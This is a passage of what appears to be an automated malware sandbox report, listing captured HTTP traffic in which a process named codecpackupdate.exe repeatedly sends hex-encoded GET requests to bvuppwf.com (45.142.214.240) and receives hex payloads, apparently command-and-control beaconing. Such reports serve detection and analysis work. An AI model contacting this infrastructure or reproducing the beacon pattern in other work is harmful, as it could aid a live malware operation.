39 63 65 61 31 38 30 66 61 64 32 63 38 62 63 36 31 30 37 32 30 37 63 33 33 36 63 39 66 33 38 66 30 39 37 37 33 63 37 62 39 66 33 35 30 32 65 64 35 37 34 66 37 66 37 39 38 66 34 65 63 34 62 39 61 30 65 30 32 61 61 32 64 30 63 30 31 61 35 30 38 64 32 64 63 38 34 32 35 64 38 63 62 61 64 32 37 62 64 30 35 30 33 32 61 39 36 61 65 30 32 64 33 38 62 32 36 32 38 33 35 65 31 66 63 66 61 34 61 34 61 65 36 34 61 66 63 38 31 32 39 61 34 65 63 38 64 66 63 65 34 62 62 33 31 31 62 37 34 31 66 66 61 66 62 30 36 35 39 62 61 65 32 35 61 62 32 66 33 63 31 32 33 36 63 35 38 33 36 36 31 64 65 31 61 37 64 35 34 62 37 36 65 32 32 63 33 38 32 61 31 34 31 38 63 39 37 66 65 66 30 33 66 64 37 30 63 65 31 65 38 61 66 39 39 36 39 65 35 64 61 38 30 34 63 64 64 38 64 66 38 30 37 61 34 64 39 31 32 30 33 31 66 36 64 63 30 31 39 32 30 61 30 61 30 30 34 61 64 39 34 32 31 36 35 61 33 31 34 32 30 61 65 31 61 63 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 40067b68a8a3203a77b0418f55f677c80c450fe90cdef1701eaaa42bb4690a1e4aed3de09d841d3f38f7173ff23a794c91e28f7735eb376f579a8365fc3fed303c446d37cb515e1318e2ffa11a762cf50bbe34ee65b7746f2256592256588e114c6e5969a3bc66e9513c651872ba858b7e94123e97dd8fc79b98fe4d443e220c81735435f22fd227a0267b9ec86ff8f284fe4427d26e0285ef1f6e48cfa357aa0ec599387fd642f1aa369ec9ec1b165d1600420347aae52cdc3ae3b30bbcd08b201b9a239b1c0d532752c10d230f512e9d1b4024fd23412cc50c5f563832cb49540a3ebd0a2c13e23be73bce50f85a1bc7544a985ea23affb8f871fed14e952885264cfabc0f9df5466a79ce438af74890f3ca320ca39dc981ec958b02f05145bcbd76e5c30536283e28f2a32614e11d1c3b31919fcd6b8e9d63c7765ef3f9bc3010e5e94aece004c44d476745d3550e2d1cccdf1cb4d9d3e6544fb7c348929beca8d79894ac18429020a6795fd9cea180fad2c8bc6107207c336c9f38f09773c7b9f3502ed574f7f798f4ec4b9a0e02aa2d0c01a508d2dc8425d8cbad27bd05032a96ae02d38b262835e1fcfa4a4ae64afc8129a4ec8dfce4bb311b741ffafb0659bae25ab2f3c1236c583661de1a7d54b76e22c382a1418c97fef03fd70ce1e8af9969e5da804cdd8df807a4d912031f6dc01920a0a004ad942165a31420ae1ac0
                                                                        Mar 29, 2024 12:58:56.981125116 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
                                                                        Host: bvuppwf.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Mar 29, 2024 12:58:57.321274996 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Fri, 29 Mar 2024 11:58:57 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20
                                                                        Mar 29, 2024 12:58:57.434223890 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
                                                                        Host: bvuppwf.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Mar 29, 2024 12:58:57.738240004 CET1092INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Fri, 29 Mar 2024 11:58:57 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 33 37 34 0d 0a 36 37 62 36 39 63 39 35 33 38 30 34 62 32 36 62 35 36 35 66 65 39 35 62 33 32 31 62 64 31 39 61 35 35 66 39 38 36 64 32 65 66 31 39 30 31 65 38 61 30 34 61 65 62 30 36 64 65 66 61 38 62 65 64 39 66 38 33 34 38 39 65 34 64 64 36 65 30 63 30 33 36 33 33 61 65 35 32 66 66 64 35 63 30 31 33 32 33 65 39 37 37 35 38 61 36 37 34 66 65 36 32 62 37 33 32 35 37 63 37 65 30 64 31 30 65 64 65 34 36 63 62 37 37 62 33 31 30 66 66 33 38 38 62 32 35 65 31 30 65 61 37 36 65 63 34 34 64 62 61 65 37 34 65 66 33 35 38 37 62 34 35 65 36 32 35 36 37 39 35 33 62 36 63 38 66 66 36 31 35 64 65 65 65 39 34 39 61 32 35 63 38 36 64 38 38 31 31 64 30 35 61 38 65 32 61 62 36 35 32 62 32 65 30 35 61 33 66 65 66 36 35 64 34 66 61 36 37 62 62 38 63 65 39 64 66 34 39 65 36 33 65 63 32 31 37 33 31 35 63 34 34 32 31 65 30 32 33 36 63 30 30 36 66 61 37 65 64 38 65 66 38 38 63 32 65 35 31 65 36 35 37 37 61 32 39 66 62 33 34 35 66 66 32 66 66 66 39 38 66 66 38 32 30 37 61 61 30 65 62 34 64 39 33 38 34 66 62 37 31 32 65 31 36 61 33 36 61 65 65 39 65 64 35 62 33 36 35 63 66 36 61 30 32 32 38 33 62 36 31 61 63 35 37 63 35 64 63 61 35 33 63 33 30 62 63 63 39 31 30 62 39 30 33 62 61 62 63 33 33 62 31 63 35 63 31 33 31 37 31 32 61 30 65 64 38 33 31 65 33 31 36 66 30 64 30 62 65 30 31 35 31 64 62 33 64 30 64 63 36 35 37 64 65 66 39 36 32 39 64 32 64 62 37 39 64 35 36 61 61 66 63 64 38 61 38 64 65 33 61 32 37 62 39 36 36 62 63 65 62 30 66 39 31 61 32 62 63 37 33 35 61 61 30 38 63 66 63 32 33 62 33 66 66 38 34 38 31 30 31 65 66 31 31 65 37 34 34 38 31 34 34 36 36 63 65 62 35 63 31 66 64 64 33 34 62 36 30 61 37 38 37 65 66 33 61 62 31 37 35 38 38 30 65 32 39 61 61 32 30 64 64 33 32 64 63 39 66 30 30 63 62 35 36 62 64 33 39 31 61 31 34 35 31 64 34 64 36 36 61 35 39 32 35 35 62 36 31 38 66 66 66 38 65 32 61 32 63 36 62 34 65 31 37 63 39 64 63 62 30 31 30 30 64 66 63 64 37 62 39 66 37 64 63 33 36 37 36 37 31 65 32 33 66 38 35 63 39 30 34 30 33 34 35 38 33 61 63 63 37 31 64 34 64 34 63 64 64 36 33 37 34 35 63 33 62 34 34 65 31 64 31 64 32 63 63 66 62 63 39 35 32 38 32 33 65 36 64 34 61 65 30 37 64 33 31 38 35 33 36 62 37 63 65 39 61 37 35 38 38 35 34 63 30 38 63 32 62 31 35 30 61 37 66 39 34 66 35 38 30 65 62 31 62 30 38 62 38 32 65 38 62 64 61 31 38 37 31 30 33 64 64 33 37 63 63 66 66 39 30 30 30 37 33 32 62 37 33 39 63 33 63 31 63 65 66 35 65 34 36 36 30 36 36 38 30 34 66 64 30 62 61 61 33 65 37 33 34 61 33 64 61 63 61 31 38 34 63 38 35 32 64 64 36 34 33 35 33 38 64 61 63 64 36 36 35 64 30 35 62 33 39 62 37 36 38 65 32 32 64 32 64 62 32 36 34 38 39 34 61 31 63 63 64 61 34 62 61 61 66 36 37 61 31 64 65 30 61 39 36 34 34 64 34 64 65 63 62 34 62 61 64 32 30 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 37467b69c953804b26b565fe95b321bd19a55f986d2ef1901e8a04aeb06defa8bed9f83489e4dd6e0c03633ae52ffd5c01323e97758a674fe62b73257c7e0d10ede46cb77b310ff388b25e10ea76ec44dbae74ef3587b45e62567953b6c8ff615deee949a25c86d8811d05a8e2ab652b2e05a3fef65d4fa67bb8ce9df49e63ec217315c4421e0236c006fa7ed8ef88c2e51e6577a29fb345ff2fff98ff8207aa0eb4d9384fb712e16a36aee9ed5b365cf6a02283b61ac57c5dca53c30bcc910b903babc33b1c5c131712a0ed831e316f0d0be0151db3d0dc657def9629d2db79d56aafcd8a8de3a27b966bceb0f91a2bc735aa08cfc23b3ff848101ef11e744814466ceb5c1fdd34b60a787ef3ab175880e29aa20dd32dc9f00cb56bd391a1451d4d66a59255b618fff8e2a2c6b4e17c9dcb0100dfcd7b9f7dc367671e23f85c904034583acc71d4d4cdd63745c3b44e1d1d2ccfbc952823e6d4ae07d318536b7ce9a758854c08c2b150a7f94f580eb1b08b82e8bda187103dd37ccff9000732b739c3c1cef5e466066804fd0baa3e734a3daca184c852dd643538dacd665d05b39b768e22d2db264894a1ccda4baaf67a1de0a9644d4decb4bad200


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        1192.168.2.44974045.142.214.240807084C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Mar 29, 2024 12:58:58.279145002 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
                                                                        Host: bvuppwf.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Mar 29, 2024 12:58:58.586544991 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Fri, 29 Mar 2024 11:58:58 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        2192.168.2.44974145.142.214.240807084C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Mar 29, 2024 12:58:58.916636944 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
                                                                        Host: bvuppwf.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Mar 29, 2024 12:58:59.219975948 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Fri, 29 Mar 2024 11:58:59 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        3192.168.2.44974245.142.214.240807084C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Mar 29, 2024 12:58:59.558298111 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
                                                                        Host: bvuppwf.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Mar 29, 2024 12:58:59.854916096 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Fri, 29 Mar 2024 11:58:59 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20
                                                                        Mar 29, 2024 12:58:59.965425014 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
                                                                        Host: bvuppwf.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Mar 29, 2024 12:59:00.274084091 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Fri, 29 Mar 2024 11:59:00 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        4192.168.2.44974345.142.214.240807084C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Mar 29, 2024 12:59:00.626739979 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
                                                                        Host: bvuppwf.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Mar 29, 2024 12:59:00.923988104 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Fri, 29 Mar 2024 11:59:00 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        5192.168.2.44974445.142.214.240807084C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Mar 29, 2024 12:59:01.268338919 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
                                                                        Host: bvuppwf.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Mar 29, 2024 12:59:01.578259945 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Fri, 29 Mar 2024 11:59:01 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        6192.168.2.44974545.142.214.240807084C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Mar 29, 2024 12:59:01.924237967 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
                                                                        Host: bvuppwf.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Mar 29, 2024 12:59:02.229691982 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Fri, 29 Mar 2024 11:59:02 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20
                                                                        Mar 29, 2024 12:59:02.340536118 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
                                                                        Host: bvuppwf.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Mar 29, 2024 12:59:02.636924028 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Fri, 29 Mar 2024 11:59:02 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        7192.168.2.44974645.142.214.240807084C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Mar 29, 2024 12:59:02.972625017 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
                                                                        Host: bvuppwf.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Mar 29, 2024 12:59:03.279911041 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Fri, 29 Mar 2024 11:59:03 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20
                                                                        Mar 29, 2024 12:59:03.387979984 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
                                                                        Host: bvuppwf.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Mar 29, 2024 12:59:03.695990086 CET1286INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Fri, 29 Mar 2024 11:59:03 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 34 39 65 0d 0a 36 37 62 36 39 63 39 35 33 38 30 34 62 32 36 62 35 36 35 66 65 39 35 62 33 32 31 62 64 31 39 61 35 35 66 37 38 65 64 32 65 61 31 37 31 36 66 35 61 32 35 63 65 61 31 64 64 35 66 62 38 63 65 37 39 37 38 37 34 64 38 62 34 64 64 62 65 30 63 30 33 37 33 34 62 39 34 64 66 38 64 35 64 61 31 61 32 35 65 33 37 32 35 38 61 64 37 65 66 37 36 34 61 63 32 64 35 34 63 38 66 66 63 64 30 39 63 36 35 64 63 63 37 62 62 34 31 61 66 65 33 33 38 61 32 36 65 66 31 31 61 65 36 33 64 62 35 32 62 38 65 33 35 30 65 66 35 38 37 38 35 64 65 39 32 34 36 64 39 34 33 62 36 37 38 65 66 34 31 32 63 38 66 31 39 34 39 32 33 62 64 33 36 39 39 33 30 38 64 63 35 38 38 35 32 39 62 36 35 39 62 38 65 66 35 61 33 66 65 66 37 61 63 63 66 63 37 61 62 64 39 31 65 64 64 31 34 38 65 63 33 66 63 39 31 36 33 35 35 36 35 38 32 30 65 34 33 62 37 31 30 61 37 38 62 62 65 64 38 61 65 30 38 37 32 38 35 37 65 63 35 64 37 62 32 31 66 35 32 62 35 38 65 39 66 65 65 37 38 38 65 34 33 66 37 33 62 61 65 63 34 65 39 38 38 35 66 62 37 61 32 63 31 34 62 35 37 36 65 62 39 65 64 35 62 31 36 36 63 66 36 61 30 30 32 32 33 32 36 34 61 63 35 63 63 61 64 38 62 33 33 38 32 62 62 66 64 37 30 63 62 63 30 39 61 37 61 33 33 33 62 63 63 66 63 38 33 30 37 34 32 61 30 35 64 32 33 38 65 65 30 64 65 66 64 33 62 39 31 39 34 64 64 34 32 31 31 36 63 32 35 66 64 38 66 33 36 33 39 36 32 63 62 34 39 33 34 30 61 33 65 61 64 31 62 36 63 31 33 66 32 33 61 30 37 61 62 39 65 62 30 30 39 61 61 30 62 63 37 33 35 31 61 31 38 65 66 30 33 66 61 63 66 66 38 35 39 38 31 61 65 66 30 61 65 35 35 32 38 61 34 64 36 63 63 66 62 65 63 30 66 34 64 64 35 34 36 35 62 66 39 66 65 39 32 34 61 64 37 37 38 66 30 35 33 34 61 62 32 32 64 66 33 39 64 39 39 65 31 65 63 61 35 65 62 33 32 66 30 63 31 35 34 66 63 62 64 34 36 38 35 36 33 38 35 32 36 35 38 65 66 64 38 36 32 66 33 32 36 32 34 61 31 33 64 31 63 31 62 33 30 65 31 32 66 39 64 30 62 32 65 38 64 64 33 34 37 34 37 32 65 32 32 31 38 37 63 33 30 33 31 35 34 31 39 64 62 34 63 35 30 34 34 63 34 65 64 31 37 64 37 35 35 31 33 32 34 36 65 36 63 66 64 34 63 63 65 65 63 62 35 30 39 66 32 32 36 64 34 37 66 65 37 36 33 35 38 37 32 38 62 36 63 34 39 32 37 37 38 66 34 61 63 31 38 63 32 36 30 32 30 32 36 33 38 33 66 35 39 63 65 66 31 32 30 65 61 36 32 66 38 61 64 33 31 61 37 62 31 64 64 35 33 37 64 32 66 35 39 35 30 66 36 38 33 34 37 37 39 38 33 66 30 30 65 64 35 63 34 36 37 65 36 63 38 65 34 65 63 34 62 39 61 32 65 30 32 61 61 31 64 34 63 37 30 65 35 33 38 35 32 37 63 39 34 32 35 36 38 64 62 39 64 36 36 32 64 34 34 66 33 61 62 37 37 36 65 33 32 63 32 37 61 64 36 35 38 32 35 64 31 37 63 65 61 34 61 34 61 65 36 34 61 66 63 38 31 32 39 61 34 65 63 38 64 66 63 66 34 65 62 33 31 39 62 33 34 39 66 36 61 64 62 30 36 35 39 30 61 66 32 39 61 63 33 31 33 34 30 63 32 39 63 36 38 32 37 39 30 32 65 38 61 33 63 32 34 37 37 37 65 38 32 65 33 33 32 62 31 63 31 64 63 31 32 38 61 39 35 39 61 34 31 37 39 62 35 66 64 63 61 36 63 30 39 39 34 39 66 39 34 31 38 39 38 62 62 33 63 31 33 35 30 63 64 33 32 39 33 39 61 35 38 35 35 39 64 66 35 30 30 36 30 62 34 35 64 30 34 36 31 30 35 66 33 31 34 32 30 32 66 61 39 35 34 65 35 66 61 62 30 39 33 35 64 34 66 33 61 61 31 64 63 31 65 39 37 33 62 31 65 31 65 32 66 66 31 64 32 38 37 35 63 30 30 33 63 36 63 34 30 62 61 34 35 38 66 65 35 35 32 32 37 34 62
                                                                        Data Ascii: 49e67b69c953804b26b565fe95b321bd19a55f78ed2ea1716f5a25cea1dd5fb8ce797874d8b4ddbe0c03734b94df8d5da1a25e37258ad7ef764ac2d54c8ffcd09c65dcc7bb41afe338a26ef11ae63db52b8e350ef58785de9246d943b678ef412c8f194923bd3699308dc588529b659b8ef5a3fef7accfc7abd91edd148ec3fc91635565820e43b710a78bbed8ae0872857ec5d7b21f52b58e9fee788e43f73baec4e9885fb7a2c14b576eb9ed5b166cf6a00223264ac5ccad8b3382bbfd70cbc09a7a333bccfc830742a05d238ee0defd3b9194dd42116c25fd8f363962cb49340a3ead1b6c13f23a07ab9eb009aa0bc7351a18ef03facff85981aef0ae5528a4d6ccfbec0f4dd5465bf9fe924ad778f0534ab22df39d99e1eca5eb32f0c154fcbd468563852658efd862f32624a13d1c1b30e12f9d0b2e8dd347472e22187c30315419db4c5044c4ed17d75513246e6cfd4cceecb509f226d47fe76358728b6c492778f4ac18c2602026383f59cef120ea62f8ad31a7b1dd537d2f5950f683477983f00ed5c467e6c8e4ec4b9a2e02aa1d4c70e538527c942568db9d662d44f3ab776e32c27ad65825d17cea4a4ae64afc8129a4ec8dfcf4eb319b349f6adb06590af29ac31340c29c6827902e8a3c24777e82e332b1c1dc128a959a4179b5fdca6c09949f941898bb3c1350cd32939a58559df50060b45d046105f314202fa954e5fab0935d4f3aa1dc1e973b1e1e2ff1d2875c003c6c40ba458fe552274b
                                                                        Mar 29, 2024 12:59:03.696019888 CET104INData Raw: 31 64 31 34 36 61 34 38 63 31 30 30 31 33 32 66 61 63 34 32 65 63 63 63 33 38 31 64 63 64 64 62 30 37 64 38 62 64 64 33 37 32 32 33 31 30 39 33 61 61 32 37 35 32 32 66 31 62 66 66 64 62 32 62 35 33 37 31 64 63 64 61 32 63 37 39 61 34 38 66 35 66
                                                                        Data Ascii: 1d146a48c100132fac42eccc381dcddb07d8bdd372231093aa27522f1bffdb2b5371dcda2c79a48f5f4b54d390abd47740


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        8192.168.2.44974845.142.214.240807084C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Mar 29, 2024 12:59:04.233731985 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
                                                                        Host: bvuppwf.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Mar 29, 2024 12:59:04.543636084 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Fri, 29 Mar 2024 11:59:04 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20
                                                                        Mar 29, 2024 12:59:04.653286934 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
                                                                        Host: bvuppwf.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Mar 29, 2024 12:59:04.952740908 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Fri, 29 Mar 2024 11:59:04 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20
                                                                        Mar 29, 2024 12:59:05.059288979 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
                                                                        Host: bvuppwf.com
